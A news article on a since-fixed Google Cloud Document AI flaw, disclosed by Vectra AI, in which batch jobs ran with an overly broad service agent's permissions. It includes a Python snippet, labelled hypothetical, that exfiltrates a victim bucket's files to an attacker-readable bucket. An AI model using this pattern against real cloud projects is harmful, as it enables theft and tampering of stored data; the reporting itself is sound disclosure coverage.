Document AI, a Google Cloud service for document processing, had a worrying security flaw that allowed threat actors to steal sensitive data from victims' cloud storage buckets, and possibly even smuggle malware inside, experts have warned.
A report from cybersecurity researchers at Vectra AI, who found and reported the flaw to Google in early April 2024, explained that Google Cloud Document AI is a suite of machine learning tools that automates the extraction, analysis, and understanding of documents. It processes unstructured documents such as invoices, forms, or contracts, converting them into structured, usable information. The service is designed to improve document workflows by speeding up data extraction and improving its accuracy.
Users can process documents stored in Google Cloud Storage via so-called batch processing, which automates document analysis for large volumes of files at once. During a batch job, the service uses a "service agent", a Google-managed service account that acts as the job's identity. However, instead of running the job with the caller's permissions, batch processing runs with the service agent's permissions, which are overly broad.
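For context, here is a minimal sketch of what such a batch processing call looks like with Google's Python client library. The project, location, processor ID, and bucket URIs are placeholders, and the key point, per the report, is that the resulting job reads and writes Cloud Storage as the Google-managed service agent rather than as the caller.

```python
# Minimal sketch of a Document AI batch processing request using Google's
# Python client. Project, location, processor ID and bucket URIs are placeholders.
from google.api_core.client_options import ClientOptions
from google.cloud import documentai_v1 as documentai

client = documentai.DocumentProcessorServiceClient(
    client_options=ClientOptions(api_endpoint="us-documentai.googleapis.com")
)

# Read PDFs from one Cloud Storage prefix...
input_config = documentai.BatchDocumentsInputConfig(
    gcs_prefix=documentai.GcsPrefix(gcs_uri_prefix="gs://example-input-bucket/invoices/")
)

# ...and write the extracted, structured results to another.
output_config = documentai.DocumentOutputConfig(
    gcs_output_config=documentai.DocumentOutputConfig.GcsOutputConfig(
        gcs_uri="gs://example-output-bucket/results/"
    )
)

request = documentai.BatchProcessRequest(
    name=client.processor_path("example-project", "us", "example-processor-id"),
    input_documents=input_config,
    document_output_config=output_config,
)

# The long-running job reads and writes Cloud Storage as the Google-managed
# Document AI service agent, not as the caller who submitted the request.
operation = client.batch_process_documents(request=request)
operation.result(timeout=600)
```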
Batch processing woes
As a result, the caller (who could be a malicious actor) can reach any Google Cloud Storage bucket within the same project, and with it, all of the data stored there. The researchers demonstrated a proof of concept to Google, showing how the vulnerability could be abused to exfiltrate a PDF file, modify it, and then return it to its original location.
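To make the exfiltration path concrete, the sketch below is a hypothetical illustration, not the researchers' actual proof of concept; the project, processor ID, and bucket names are invented. It shows how a batch job's input can point at a bucket the caller cannot read directly, while its output lands somewhere the caller can read.

```python
# Hypothetical abuse pattern, continuing the sketch above; the project,
# processor ID, and bucket names are illustrative only.
from google.api_core.client_options import ClientOptions
from google.cloud import documentai_v1 as documentai

client = documentai.DocumentProcessorServiceClient(
    client_options=ClientOptions(api_endpoint="us-documentai.googleapis.com")
)

request = documentai.BatchProcessRequest(
    name=client.processor_path("victim-project", "us", "example-processor-id"),
    # Input: a sensitive bucket in the same project that the caller's own
    # credentials cannot read, but the service agent's permissions can.
    input_documents=documentai.BatchDocumentsInputConfig(
        gcs_prefix=documentai.GcsPrefix(gcs_uri_prefix="gs://victim-sensitive-bucket/")
    ),
    # Output: a location the caller can read, so the processed contents are
    # effectively exfiltrated. Per the researchers, the same overly broad
    # write access could then be used to place a modified file back.
    document_output_config=documentai.DocumentOutputConfig(
        gcs_output_config=documentai.DocumentOutputConfig.GcsOutputConfig(
            gcs_uri="gs://attacker-readable-bucket/exfil/"
        )
    ),
)
client.batch_process_documents(request=request).result(timeout=600)
```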
Soon after learning about the issue, Google apparently released a patch and marked the problem as 'fixed'. However, the researchers said the fix wasn't sufficient and kept pressing the company. Finally, in early September 2024, Google confirmed the issue had been resolved, although it downgraded the severity of the report "because the attacker needs to have an access to an impacted victim's project."
Via The Register